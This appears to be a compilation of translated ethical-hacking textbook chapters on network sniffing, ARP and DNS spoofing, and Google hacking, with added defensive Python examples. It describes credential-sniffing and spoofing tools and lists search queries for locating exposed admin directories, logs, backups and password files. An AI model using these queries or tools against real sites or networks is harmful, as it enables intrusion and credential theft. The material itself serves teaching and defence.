
CHAPTER 11: SNIFFERS

A sniffer can be a packet-capture or frame-capture tool. It intercepts the packets exchanged on the network and displays them in a command-line or GUI (graphical user interface) form so that the hacker can follow them. Some sophisticated sniffers understand the packets and can reassemble a stream of packets into the original data, such as an e-mail or a document.

1. What are sniffers?
According to the dictionary, "sniff" means to smell, to scent out, to eavesdrop. A sniffer, in general, is any method of secretly capturing and analyzing packets on a network. Sniffers are used to capture the traffic exchanged between two systems. Depending on how the eavesdropping is done and on the level of security in the system, a hacker can use a sniffer to discover login names, passwords and other confidential information exchanged on the network. Some attacks and some kinds of hacking tools require a sniffer to obtain important information sent from the system the hacker is targeting.

2. Protocols that are easily sniffed


Sniffing software works by capturing packets whose destination is not the MAC address of the sniffer's own system but the MAC address of a target. This is known as promiscuous mode. Normally, a system on the network reads and responds only to traffic sent directly to its own MAC address. In promiscuous mode, however, the system reads all traffic on the network and passes it to the sniffer for processing. Promiscuous mode is enabled on the network card by installing a special driver. Some sniffing hacking tools include a promiscuous-mode driver to make their work easier. Some protocols that do not encrypt their data are very easy to sniff. Protocols such as HTTP, POP3, SNMP (Simple Network Management Protocol) and FTP are common protocols whose packets are very easily captured with a sniffer and read by a hacker to obtain values such as usernames or passwords.

Hacking Tool

Ethereal: a free sniffer that can capture packets from wired and wireless LAN connections. Its latest version has been renamed Wireshark. Ethereal is a popular and well-liked program because it is free, but it has one limitation: less experienced users may find it difficult to write the filters Ethereal needs in order to capture only certain kinds of packets crossing the network.
Snort: an intrusion detection system (IDS) that also has sniffing capability. It can be used to detect a wide range of attacks and probe attempts, such as buffer overflows, stealth port scans, CGI attacks and SMB (Server Message Block) probes.
Windump: the Windows version of tcpdump, the Unix command-line network analyzer. Windump is fully compatible with tcpdump and can be used to watch, diagnose and save network traffic to disk according to various rules.
Etherpeek: an excellent sniffer for wired networks, with extensive filtering and the ability to follow TCP/IP conversations. The newest version of Etherpeek has been renamed OmniPeek.
Winsniffer: a very effective password sniffer. It watches the traffic entering and leaving the system and decodes FTP, POP3, HTTP, ICQ, SMTP (Simple Mail Transfer Protocol), telnet, IMAP (Internet Message Access Protocol) and NNTP (Network News Transfer Protocol) usernames and passwords.
Iris: a good network traffic and data analyzer; it collects, stores, organizes and reports on all data travelling on the network. Unlike other sniffers, Iris can reconstruct network traffic, such as graphics, documents and e-mails, including attached files.

3. Sniffing techniques
There are two different kinds of sniffing: active and passive. Passive sniffing involves listening to and capturing network traffic, and it is very useful on networks connected with hubs. Active sniffing involves performing Address Resolution Protocol (ARP) spoofing, or flooding a switch with traffic, in order to capture traffic on the network. As its name suggests, active sniffing can be detected, whereas passive sniffing cannot. On a network that uses hubs or wireless devices as the connecting medium, all hosts on the network can see all traffic; therefore a sniffer can capture the traffic sent to and from all hosts connected through the hub.

A switched network operates differently. A switch looks at the data sent to it and tries to forward packets only to the destinations identified by their MAC address. A switch maintains a table of the MAC addresses of all systems and the port numbers they are connected through. This lets the switch segment the network and send data only to the destination with the exact MAC address. A switched network handles more traffic better and is more secure than a shared network built on hubs.

ARP poisoning
ARP allows a network to resolve IP addresses into MAC addresses. When a host using TCP/IP on a LAN tries to communicate with another host, it needs the MAC (hardware) address of the host it is trying to reach. It first looks in its ARP cache to see whether the MAC address is already there; if it is not, the host broadcasts an ARP request asking: "Who has the IP address I am looking for?" If the host with that IP address hears the ARP question, it responds with its MAC address and a TCP/IP session can begin.

ARP poisoning is a technique used to attack an Ethernet network; it lets a hacker sniff data on a switched LAN or stop all traffic on the network. ARP poisoning uses ARP spoofing, that is, sending fake or forged ARP messages onto the Ethernet LAN. Packets containing wrong MAC addresses confuse network devices such as switches. As a result, packets meant for one machine may be misdirected to another (allowing the packets to be sniffed) or may not reach their host at all (a DoS attack). ARP spoofing can be used in a man-in-the-middle attack, in which all traffic crossing the network is routed through one host by means of ARP spoofing and analyzed to find passwords and other information.

To avoid ARP spoofing attacks, the MAC address of the gateway should be permanently added to the ARP cache of each system. On a Windows system you can do this with the command ARP -s in a command-line window, followed by the IP address and MAC address of the gateway. Doing so prevents a hacker from overwriting the ARP cache to carry out ARP spoofing against the system, but it becomes hard to manage in a large environment because of the number of systems. In an enterprise environment, port-based security can be enabled on the switch to allow only one MAC address per port.
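As an added example (not code from the original text), the detector below applies the two checks the paragraph above implies: a static IP-to-MAC binding for the gateway that must never change, and an alert whenever an ARP reply claims a different MAC for an IP already learned. All frames, addresses and MACs are constructed inline for the demonstration; nothing is sent on the wire.

```python
"""Detect ARP-cache poisoning attempts from captured ARP replies (added example)."""
import struct
from typing import Dict, List, Optional

ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2


def mac_to_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_to_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def parse_arp(frame: bytes) -> Optional[dict]:
    """Parse an Ethernet II frame carrying ARP for IPv4; return None for anything else."""
    if len(frame) < 14 + 28:
        return None
    if struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    arp = frame[14:42]
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", arp[:8])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "oper": oper,
        "sender_mac": mac_to_str(arp[8:14]),
        "sender_ip": ip_to_str(arp[14:18]),
        "target_mac": mac_to_str(arp[18:24]),
        "target_ip": ip_to_str(arp[24:28]),
        "eth_src": mac_to_str(frame[6:12]),
    }


class ArpMonitor:
    """Tracks IP-to-MAC bindings seen in ARP replies and reports contradictions."""

    def __init__(self, static: Dict[str, str]):
        # Static entries play the role of the 'ARP -s' bindings described in the text.
        self.static = {ip: mac.lower() for ip, mac in static.items()}
        self.seen: Dict[str, str] = dict(self.static)
        self.alerts: List[str] = []

    def observe(self, frame: bytes) -> Optional[str]:
        pkt = parse_arp(frame)
        if pkt is None or pkt["oper"] != ARP_REPLY:
            return None
        ip, mac = pkt["sender_ip"], pkt["sender_mac"]
        alert = None
        if ip in self.static and mac != self.static[ip]:
            alert = f"static binding violated: {ip} is {self.static[ip]}, reply claims {mac}"
        elif ip in self.seen and mac != self.seen[ip]:
            alert = f"binding changed: {ip} was {self.seen[ip]}, reply claims {mac}"
        elif pkt["eth_src"] != mac:
            alert = f"ethernet source {pkt['eth_src']} differs from ARP sender {mac}"
        if alert:
            self.alerts.append(alert)
        else:
            self.seen[ip] = mac  # learn a consistent binding
        return alert


def build_arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Build a constructed ARP reply frame used only as sample input for the monitor."""
    mac = lambda s: bytes(int(x, 16) for x in s.split(":"))  # noqa: E731
    ip = lambda s: bytes(int(x) for x in s.split("."))  # noqa: E731
    eth = mac(target_mac) + mac(sender_mac) + struct.pack("!H", ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += mac(sender_mac) + ip(sender_ip) + mac(target_mac) + ip(target_ip)
    return eth + arp


def demo() -> List[str]:
    """Feed four constructed replies to the monitor; two of them contradict known bindings."""
    gateway_ip, gateway_mac = "192.168.1.1", "00:11:22:33:44:55"  # constructed
    victim_mac, rogue_mac = "aa:bb:cc:dd:ee:01", "de:ad:be:ef:00:01"  # constructed
    mon = ArpMonitor(static={gateway_ip: gateway_mac})
    frames = [
        build_arp_reply(gateway_mac, gateway_ip, victim_mac, "192.168.1.10"),  # legitimate
        build_arp_reply("aa:bb:cc:dd:ee:02", "192.168.1.20", victim_mac, "192.168.1.10"),  # new host
        build_arp_reply(rogue_mac, gateway_ip, victim_mac, "192.168.1.10"),  # contradicts static entry
        build_arp_reply(rogue_mac, "192.168.1.20", victim_mac, "192.168.1.10"),  # rebinds learned host
    ]
    for frame in frames:
        mon.observe(frame)
    return mon.alerts


if __name__ == "__main__":
    for line in demo():
        print("ALERT:", line)
```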
Hacking Tool

Three popular tools used to perform ARP spoofing are:


Arpspoof: a tool for the Linux operating system
Ettercap: available for both Windows and Linux
ArpSpyX: for Mac OS

Ethereal is a free sniffer that can capture packets on wired or wireless LAN connections. Some examples of Ethereal filters:
ip.dst eq www.eccouncil.org captures packets sent to the web server www.eccouncil.org
ip.src == 192.168.1.1 captures packets coming from the host 192.168.1.1
eth.dst eq ff:ff:ff:ff:ff:ff captures layer-2 broadcast packets

MAC flooding
A packet sniffer on a switched network cannot capture all network traffic the way it can on a hub network; instead, it only captures the packets entering or leaving its own system. An additional tool is needed to capture all traffic on a switched network. Basically there are two ways to sniff actively and make the switch send the traffic passing through it to the system running the sniffer: ARP spoofing and flooding. As described above, ARP spoofing impersonates the MAC address of the network's gateway, so that all traffic destined for the gateway is received by the sniffing system. A hacker can also flood a switch with so much traffic that it stops operating as a switch and instead behaves like a hub, sending all traffic to all ports. Either active sniffing attack allows a system running a sniffer to capture all traffic on the network.

DNS spoofing techniques


DNS spoofing (DNS poisoning) is a technique that tricks a DNS server into believing it has received authoritative information when it has received no such authority at all. Once a DNS server has been poisoned, the information is usually cached for a period of time, spreading the effect of the attack to the users of that server. When a user asks for a particular website address, the address is looked up on the DNS server to find the corresponding IP address. If the DNS server has been compromised, the user is sent to a website other than the one requested, for example a fake one. To carry out a DNS attack, the attacker exploits a flaw in the DNS server software that makes it accept incorrect information. If the server does not correctly validate DNS responses to ensure they come from a trusted source, the server ends up caching the incorrect entries and serving them to users who make the same request later. This technique can be used to replace arbitrary content for a set of victims with content of the attacker's choosing. For example, an attacker poisons the DNS entries for a target website on a particular DNS server, replacing its IP addresses with the addresses of a server under the hacker's control. The attacker then creates fake files on this server whose names match the files on the attacked server. These files may contain malicious content such as a worm or a virus. A computer user who relies on the poisoned DNS server is tricked into believing the content is being provided by the attacked server and unknowingly downloads the malicious files.

The kinds of DNS spoofing attacks:

Intranet spoofing acts as a device on the same internal network.

Internet spoofing acts as a device on the Internet.

Proxy server DNS poisoning modifies the DNS entries in a proxy server to redirect users to a different host system.

DNS cache poisoning modifies the DNS entries on some systems to redirect users to a different system.
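The paragraph above says a resolver that does not check that a response really answers its own query ends up caching poisoned entries. As an added example (not from the original text), the function below accepts a DNS response only if its QR flag is set, its transaction ID matches the outstanding query, its question section echoes the query, and its answers are for the queried name. The query, the genuine response and the two bad responses are constructed inline; 203.0.113.x and 10.0.0.x are placeholder addresses.

```python
"""Validate a DNS response against the outstanding query before caching it (added example)."""
import struct
from typing import List, Tuple


def encode_name(name: str) -> bytes:
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(msg: bytes, off: int) -> Tuple[str, int]:
    """Decode a possibly compressed name; return (name, offset just after it)."""
    labels, jumped, end = [], False, off
    for _ in range(128):  # bound the walk so a pointer loop cannot hang us
        length = msg[off]
        if length & 0xC0 == 0xC0:  # compression pointer (RFC 1035 4.1.4)
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            if not jumped:
                end = off + 2
            off, jumped = ptr, True
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    else:
        raise ValueError("name too long or pointer loop")
    if not jumped:
        end = off
    return ".".join(labels), end


def build_query(txid: int, qname: str) -> bytes:
    """Standard recursive A query: header + one question."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(qname) + struct.pack("!HH", 1, 1)


def build_response(txid: int, qname: str, answer_name: str, ip: str) -> bytes:
    """Constructed response with one A record (no compression) used as sample input."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = encode_name(qname) + struct.pack("!HH", 1, 1)
    rdata = bytes(int(x) for x in ip.split("."))
    answer = encode_name(answer_name) + struct.pack("!HHIH", 1, 1, 300, 4) + rdata
    return header + question + answer


def validate_response(query: bytes, response: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). Only accepted responses should ever reach the cache."""
    if len(response) < 12:
        return False, "truncated header"
    q_txid, _, q_qd = struct.unpack("!HHH", query[:6])
    r_txid, flags, qdcount, ancount = struct.unpack("!HHHH", response[:8])
    if not flags & 0x8000:
        return False, "QR bit not set (not a response)"
    if r_txid != q_txid:
        return False, f"transaction id mismatch ({r_txid:#06x} != {q_txid:#06x})"
    if qdcount != 1 or q_qd != 1:
        return False, "unexpected question count"
    qname, q_end = decode_name(query, 12)
    qtype, qclass = struct.unpack("!HH", query[q_end:q_end + 4])
    rname, r_end = decode_name(response, 12)
    rtype, rclass = struct.unpack("!HH", response[r_end:r_end + 4])
    if (qname.lower(), qtype, qclass) != (rname.lower(), rtype, rclass):
        return False, "question section does not echo the query"
    off = r_end + 4
    for _ in range(ancount):  # simplified: every answer must be for the queried name
        aname, off = decode_name(response, off)
        _atype, _aclass, _ttl, rdlen = struct.unpack("!HHIH", response[off:off + 10])
        off += 10 + rdlen
        if aname.lower() != qname.lower():
            return False, f"answer for {aname} is out of scope for query {qname}"
    return True, "accepted"


def demo() -> List[Tuple[bool, str]]:
    """One genuine response and two forged ones (wrong ID, wrong answer name)."""
    query = build_query(0x1A2B, "www.example.com")
    genuine = build_response(0x1A2B, "www.example.com", "www.example.com", "203.0.113.10")
    wrong_id = build_response(0x1A2C, "www.example.com", "www.example.com", "10.0.0.5")
    wrong_name = build_response(0x1A2B, "www.example.com", "mail.example.com", "10.0.0.5")
    return [validate_response(query, r) for r in (genuine, wrong_id, wrong_name)]


if __name__ == "__main__":
    for ok, reason in demo():
        print("ACCEPT" if ok else "REJECT", reason)
```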


Hacking Tools

EtherFlood is used to flood an Ethernet switch with traffic so that it turns into a hub. This way an attacker can capture all traffic on the network, whereas normally, as is the case with a switch, only the traffic to and from their own system could be captured.
Dsniff is a collection of Unix executables designed for network auditing and network penetration. Dsniff contains the following tools: filesnarf, mailsnarf, msgsnarf, urlsnarf and webspy. These tools passively monitor a vulnerable shared network (such as a LAN where the sniffer sits behind any external firewall) for interesting data (passwords, e-mail, files and so on). sshmitm and webmitm implement active man-in-the-middle attacks against redirected SSH (secure shell) and HTTPS sessions.

Arpspoof, dnsspoof and macof work by intercepting network traffic that passes through a switch and that would normally be unavailable to a sniffer because of the nature of switching. To get around the problem of layer-2 packet switching, dsniff fools the devices into believing it is the gateway that data must pass through to leave the network.
IP Restrictions Scanner (IRS) is commonly used to discover the IP restrictions set for a particular service on a host. It combines ARP poisoning with TCP single-packet or half-scan techniques and tests forged TCP connections, one by one, against selected ports of the target. IRS scans hosts and network devices such as routers and switches to identify their access-control features, such as access-control lists (ACLs), IP filters and firewall rules.
sTerm is a Telnet client with a unique feature: it can establish a bidirectional Telnet session to a target host without ever sending its real IP address and real MAC address in any packet. Using ARP poisoning, MAC spoofing and IP spoofing techniques, sTerm can effectively bypass ACLs, firewall rules and IP restrictions on hosts and network devices.
Cain & Abel is a multipurpose attack tool for Windows. It allows easy recovery of various kinds of passwords by sniffing the network; cracking encrypted passwords using dictionary and brute-force attacks (in computer programming, brute force is a method of solving a hard problem by repeating a simple procedure many times; a computer spell checker works by brute force in this sense: it does not actually check spelling but simply compares every word in your document against the words of a built-in spelling dictionary); recording VoIP conversations; decoding scrambled passwords; revealing password boxes; uncovering cached passwords; and analyzing routing protocols. The latest version includes many new features such as APR (ARP Poison Routing), which enables sniffing on switched LANs and man-in-the-middle attacks. The sniffer in this version can also analyze encrypted protocols such as SSH-1 and HTTPS, and it contains filters to capture credentials from a wide range of authentication mechanisms.
Packet Crafter is a tool commonly used to create custom TCP/IP/UDP packets. It can change the source address of packets to perform IP spoofing, and it can control the IP flags and TCP flags, sequence numbers and ACK (acknowledgment) numbers.
SMAC is a tool that changes the MAC address of a system. It helps a hacker spoof a MAC address while carrying out an attack.
MAC Changer is a tool used to spoof MAC addresses on Unix. It can set a specific MAC address on each interface, set a random MAC address, set a MAC address of another vendor, set another MAC address of the same vendor, set a MAC address of the same kind, or even display the vendor MAC list to choose from.

WinDNSSpoof is a simple DNS ID spoofing tool for Windows. To use it on a switched network, you must be able to sniff the traffic of the attacked machine, so it can be combined with an ARP spoofing or flooding tool.
Distributed DNS Flooder sends a large number of queries to create a DoS (denial of service) attack that disables DNS. If the daemon software logs incorrect queries, the effect of the attack is amplified.

4. Sniffing countermeasures


The best security measure against a sniffer on the network is encryption. Although encryption does not prevent sniffing, it makes any sniffed data useless because the hacker cannot interpret the information. Encryption such as AES and RC4 or RC5 can be used in VPN technology and is the common standard for defeating sniffers.
Countermeasures Tool

netINTERCEPTOR is an anti-spam and anti-virus firewall. It has many advanced filtering options and can learn and adapt, so that it can recognize new kinds of junk mail (spam). It also blocks and quarantines the latest Trojan-infected e-mails, preventing a Trojan from being installed and possibly installing a sniffer.
Sniffdet is a set of tests for remote sniffer detection in TCP/IP environments. Sniffdet implements various tests to detect machines running in promiscuous mode or running a sniffer.
WinTCPKill is a TCP connection termination tool for Windows. It requires the ability to use a sniffer to sniff the incoming and outgoing traffic of the attacked machine. On a switched network, WinTCPKill can use an ARP cache poisoning tool to perform ARP spoofing.

5. Lesson summary
How sniffers work: a sniffer operates in promiscuous mode, meaning it captures all traffic regardless of the destination MAC address in the frames. The difference between sniffing on a hub network and on a switched network: all traffic is broadcast by hubs, but it is divided into segments by a switch. To sniff on a switched network, flooding or ARP spoofing tools must be used. The difference between active and passive sniffing:

Active sniffing is used to trick the attacked switch into behaving like a hub, so that the switch sends all network traffic to the attacker.

Passive sniffing: captures the packets broadcast on the network.

///////////

CHAPTER 3: GOOGLE HACKING


Nguyễn Tấn Thành

All of us know that Google is a giant in the field of search. People can find any information on Google, from the biggest matters to the most trivial. Any information at all, as long as it is displayed on a web page, can be found by Google. In the previous chapter we mentioned the reconnaissance technique of footprinting, and later you will meet the topic of social engineering; both fields make some use of Google to search for information in support of attacking a system. Using the Google search engine to trace a target, and even to attack a system, is what Google hacking is. With Google's powerful search capabilities, a hacker can find a great deal of information useful for tracking a target and attacking it. This chapter presents the outstanding search tricks of Google that matter to a hacker. From learning how you can find a target's information, you will draw your own lessons on how to keep information from leaking out.

1. What is Google Hacking?
In short, Google hacking consists of tasks such as:

Using the search engine to trace information about the target under surveillance. With the same search engine, special search syntax can help a hacker find security-relevant information such as usernames, computer names, passwords and logon pages. Using Google to carry out attacks; how this is done will be explained later.

Information worth looking for. Google's search capability is enormous; which data we care about depends on our field of interest. In hacking, we need to pay attention to the following kinds of data:

Network diagrams and information about servers with security vulnerabilities. Error messages that contain important information. Files that contain passwords.

Directories with sensitive content, such as config and system. Logon pages of websites. Pages that contain network information or sensitive data, such as firewall logs.

Google and its search results. With Google, the fewer keywords you type, the more results you get; conversely, a longer query gives fewer results. Combining special keywords with Google's search syntax narrows the scope of the search and gives more accurate results, faster. Google result sets are usually very large; a few thousand hits is normal. However, have you ever looked at the last pages of results? Surely not, because you were not patient enough. Yet it is precisely those remote, rarely visited places that hide the secrets a hacker should visit. With the keyword administrator, the first pages show ordinary web articles related to the word administrator. If you take the trouble to go to the last pages of results, you can find information about the administrator managing some website. Or with the keyword username, we can find a username for logging in to a system.

2. Google Hacking Basics


Now the real game begins. Something that seems as simple as searching on Google can bring a hacker a great deal. Next you will learn about Google hacking techniques. They are simply Google features that are too good to ignore.

Anonymity with Caches


Google's cache feature is truly remarkable. Google stores copies of many websites that you and others visit. At any time you can look at a web page stored in Google's cache, even after it has been deleted from the server. As has been said, Google Cache keeps everything.

Figure 3.1: Everything is kept in the cache

Google stores all the data it collects. Terabytes of web data leak out every year. A hacker can use Google to carry out an anonymous attack. Suppose you post some information on your website. Not long afterwards you delete the page, not wanting the news to spread any further. Yet people can still read the information you posted. They do not read it directly from your website but from Google's cache. Or suppose you visit the page for entering personal details when registering with an online shop. It is a disaster when your information, which the shop promised to keep confidential, still leaks out. What happened? Google cached your information when you viewed your own details page. In short, a lot of sensitive information about you and about your company or organization may be cached by Google, and when at some point you no longer want it on the Internet, it is still available through Google's cache. A clever hacker can find a lot of useful information stored in this cache.

Using Google as a Proxy Server


For this feature we look at Google's Translate tool, at http://translate.google.com.vn. We all know it is used to translate passages of text. But if it only handled text, we would have no proxy server. Google Translate can also translate an entire web page. Enter the address of the web page into the text box and Google will translate the whole page for us. At that point we are visiting the website not directly from our own machine but through another machine, Google's. In the example page below, I will visit the website www.uit.edu.vn through Google Translate.

Figure 3.2: Result of visiting the website www.uit.edu.vn through Google Translate

You may wonder why I translated from English to Vietnamese. That is because I want to view my website in Vietnamese, the original language of the page; you get an error message if you try to translate a Vietnamese page into Vietnamese. Look at the output of tcpdump (a packet-capture program), which shows the communication between your computer and the Internet when you visit the website above.

Figure 3.3: tcpdump output

First, your computer (192.168.2.32:53466) sends a request to the web server (64.233.171.104:80), which is Google's server, and the uit.edu.vn server never appears anywhere in the data exchange.

Directory Listings
A directory listing is a special kind of web page that shows the list of files and directories present on the server. The distinguishing feature of this kind of page is that it needs no programming or complex web design. It is used for sharing resources. Just as with FTP, we can fully set permissions on these files and directories.

Figure 3.4: A directory listing on a website

Most web server applications display a directory listing like this when the requested address contains no default page, that is, when the web developer has not placed a default page such as index.php or default.html in the directory. This is harmful when the directory contains important files such as config.php. If you are a website developer, pay particular attention to this issue. There are several ways to prevent this kind of directory listing in the browser. The simplest is to add an empty default page to the directory, so that a user who visits the directory sees only a blank page. Another way is to use the .htaccess configuration file. To search for pages like this you can use the keyword index of /. Why? Look at figure 3.4: the pages that display directories all contain the text index of. Searching for special directories and files means directories such as administrator or configuration, or files such as *.log, *.sys or *.conf. To find such directories you can add the intitle: keyword. For example, the syntax intitle:index of admin or intitle:index of inurl:admin gives us pages related to the website's administration pages. The syntax intitle:index of ws_ftp.log helps us find the file ws_ftp.log.

Figure 3.5: Search results for a special directory

Server version. Finding the version of the server-side application helps a hacker plan an attack better. There are several ways to find server information:

The HTTP header may reveal the application version number. Some scanning tools can also help. The directory listing feature above also shows server information at the bottom; looking back at the figure, we can clearly see the version line: Apache / 2.0.52 (Unix) Server at xml.apache.com. This means the server is running the Unix operating system, the web server application is Apache version 2.0.52, and the web server's address is xml.apache.com.

To search for application version information you can use the syntax Server at, for example intitle:index of / server at.

Directory Traversal
"Travel" means to journey, so directory traversal can be understood as wandering through directories. To explain this, let us return to the directory listing result in the figure below.

Figure 3.6: A directory listing

This result shows the directory listing for the path /bpa/acadunits/admin/envr/bowman. Looking closely, we see that the admin directory is two levels above the current one, and there is a Parent Directory link on the first row. That means that by clicking this link we can reach the admin directory and browse all the other directories as well. Traversal, then, can be understood as a technique for expanding search results from a small starting point. Using Google's search engine it is not hard to find directories like this. For example, the query site:cl.uh.edu inurl:bpa/acadunits/admin ws_ftp.log can find many special files and much more of the information we need. To browse the whole directory tree there is one more approach: changing parts of the URL. For example, you can change admin above into other meaningful words such as student, public or teacher.

Incremental substitution. This is another technique for browsing files and directories. By reasoning and changing the necessary characters in the URL path, we can find the files or directories we want. For example, you find a file at the path /docs/bulletin/2.xls; changing it to /docs/bulletin/3.xls may well find the file 3.xls. Another example: you find the path /DigLib_thumbnail/spmg/hel/0001/H/; try changing it to /DigLib_thumbnail/spmg/hel/0002/H/ and you may find something unexpected. With the search syntax filetype:xls inurl:1.xls or intitle:index.of inurl:0001 you can find other files like these.

Hacking Tool

Some download tools, such as IDM (Internet Download Manager), have a feature that helps the user find and download many files whose paths differ in only one part. For example, you can find and download all files at the path .tuoitre.vn/save/media/radio/radio-*.mp3, where the * stands for the characters 001 through 099.

Extension walking. Try Google's filetype syntax. Its job is to find files with a specified extension; for example, filetype:HTML finds files with the extension HTML. So if you know that files in certain formats hold important content, such as .bak, .sql or .conf, you can start hunting for them. For example, the syntax intitle:index.of index.php.bak may reveal some hidden things.
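The directory-listing section above recommends giving every directory a default page, and the extension-walking paragraph shows that .bak, .sql, .conf and similar files are easy to discover. As an added example (not code from the original text), the audit below walks a document root and reports both exposures so a site owner can fix them before a search engine indexes them; the sample web root is constructed inline in a temporary directory, and the index-file and risky-extension sets are assumptions you should adapt to your server.

```python
"""Audit a web document root for directory-listing and extension-walking exposure (added example)."""
import os
import tempfile
from typing import Dict, List

# Assumed default-page names; add whatever your server's DirectoryIndex lists.
INDEX_FILES = {"index.html", "index.htm", "index.php", "default.html", "default.htm"}
# Assumed set of extensions that leak source, credentials or logs when served.
RISKY_EXT = {".bak", ".sql", ".conf", ".log", ".sys", ".old", ".orig", ".swp"}


def audit_webroot(root: str) -> Dict[str, List[str]]:
    """Return directories with no default page and files with risky extensions.

    A directory without a default page is listable on servers that enable
    indexes (on Apache, 'Options -Indexes' turns that off globally); a risky
    file is findable with a filetype: / intitle:index.of query as shown above.
    """
    listable, risky = [], []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        rel = os.path.relpath(dirpath, root)
        rel = "/" if rel == "." else "/" + rel.replace(os.sep, "/")
        names = {f.lower() for f in filenames}
        if not names & INDEX_FILES:
            listable.append(rel)
        for name in filenames:
            _, ext = os.path.splitext(name)
            if ext.lower() in RISKY_EXT:
                risky.append(rel.rstrip("/") + "/" + name)
    return {"listable_dirs": sorted(listable), "risky_files": sorted(risky)}


def build_sample_root() -> str:
    """Create a constructed web root in a temp directory for the demonstration."""
    root = tempfile.mkdtemp(prefix="webroot_")
    sample_files = [
        "index.php",            # root has a default page
        "config.php",
        "config.php.bak",       # editor/backup copy of the config: risky
        "admin/login.php",      # no default page: listable
        "backup/site.sql",      # listable and a database dump: risky
        "logs/ws_ftp.log",      # listable and an FTP log: risky
        "images/index.html",    # protected by an (empty) default page
        "images/logo.png",
    ]
    for rel in sample_files:
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="ascii") as fh:
            fh.write("")  # content does not matter for the audit
    return root


def demo() -> Dict[str, List[str]]:
    return audit_webroot(build_sample_root())


if __name__ == "__main__":
    report = demo()
    print("Directories without a default page:", *report["listable_dirs"], sep="\n  ")
    print("Files with risky extensions:", *report["risky_files"], sep="\n  ")
```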

3. Google Advanced Operators


Surely all of us are more or less familiar with Google's common search syntax. Applying it can give us faster and more accurate results. The following operators, however, are more suited to a hacker.

site: This operator searches for information within one site, which lets us narrow the scope of the search. For example, site:uit.edu.vn restricts the search to the website uit.edu.vn.

intitle:index of. We have had occasion to use this syntax to search for directories. It is also considered a powerful operator for hackers.

Error | Warning. These two keywords are used to search for error information. Some error messages produced during development create a hole that a hacker can use to break in.

Login | Logon. This syntax finds logon pages. It may be just an ordinary website login page, but it may also be the login page of a more special system. Once at the door, how the attack proceeds depends on many things.

Username | Userid | employerID | your user name. This is a series of keywords for finding usernames used to log in to a system. Why can we find them? Because of careless mistakes by programmers. For example, a developer inadvertently displays the message "The account tranvanteo has not yet been activated".

Password | Passcode | Your password is. Similar to the username syntax. We easily find messages of the form "Your password is AHTlkYu".

Admin | Administrator. With this keyword we can narrow the search to information related to admin: administration pages for the admin, the admin's information, and many other admin-related things. Combined with Google's cache feature, the results get even better.

ext:html ext:htm ext:shtml ext:asp ext:php. And there are many more ext-related operators. This syntax helps us find the files we want. For a hacker, the files of interest include php, html, bak, conf and sys.

inurl:temp | inurl:tmp | inurl:backup | inurl:bak. Like ext, but searching by directory rather than by file. Directories a hacker is interested in include temp, backup, admin and conf.

intranet | help.desk. Information related to a company's helpdesk should not be overlooked in an attack either. This syntax helps us find a lot of information related to the helpdesk.

4. Google Hacking Tools


Having to remember the special hacker-oriented search syntax above is a nuisance. Fortunately, many tools help us run these search queries more easily.

Figure 3.7: The Google Hacking Database website

Figure 3.8: The GooLink interface

The first and most formidable is the Google Hacking Database. It collects search results for thousands of security vulnerabilities, files containing usernames, logon pages and files with important content. Visit the website http://johnny.ihackstuff.com to explore this huge database. SiteDigger, Gooscan and Goolink Scanner are other useful tools that let us search with more specific, hacker-oriented queries. Google Hacks: this is the Google Hacks community at http://code.google.com/p/googlehacks. Together with the tools these groups provide, they help us make the most of Google's facilities when searching and attacking systems. The Google Hacks tool not only lets us search for information but also lets us use Google as a proxy server.

Figure 3.9: The Google Hacks interface

5. Summary
At the end of this section, we should clearly understand the following:

Google is a powerful search tool, and precisely because it is so powerful it has become an attack tool for hackers. Google's tools can be used as a proxy server when anonymous web access is needed. There are many different search tricks that give us the results we expect, such as the techniques for finding directories and server versions. The important operators and keywords, which are worth knowing, are also used in searches to narrow the search scope.

//////////////////

CHAPTER 2: FOOTPRINTING
To begin attacking a system, you need to carry out three steps: footprinting, scanning and enumeration. Before getting into the real game, you should understand these tasks in outline. Specifically, we will now look at footprinting. Consider a robber who wants to rob a bank: he cannot simply walk in and demand money; he will work hard to gather information about that bank. The information he collects may include the route the armored car takes, delivery times, the number of tellers, and other details that help the job succeed.

The same requirement applies to an attacker on the network. They must gather as much information as possible about every security-related aspect of the organization. The result helps the attack go more smoothly. By following footprints, Internet archives, remote access and the organization's Internet presence, an attacker can systematically collect information about an organization from many different sources.

What is footprinting? Footprinting is part of the preparatory pre-attack phase and involves accumulating data about a target's environment and architecture, usually with the aim of finding a way to intrude into that environment. Footprinting can reveal system vulnerabilities and identify how easily they could be exploited. It is the easiest way for hackers to gather information about computer systems and the companies they belong to. The purpose of this preparatory phase is to learn as much as you can about a system, its remote-access capabilities, its ports and services, and any specific aspects of its security.

1. Scope of footprinting
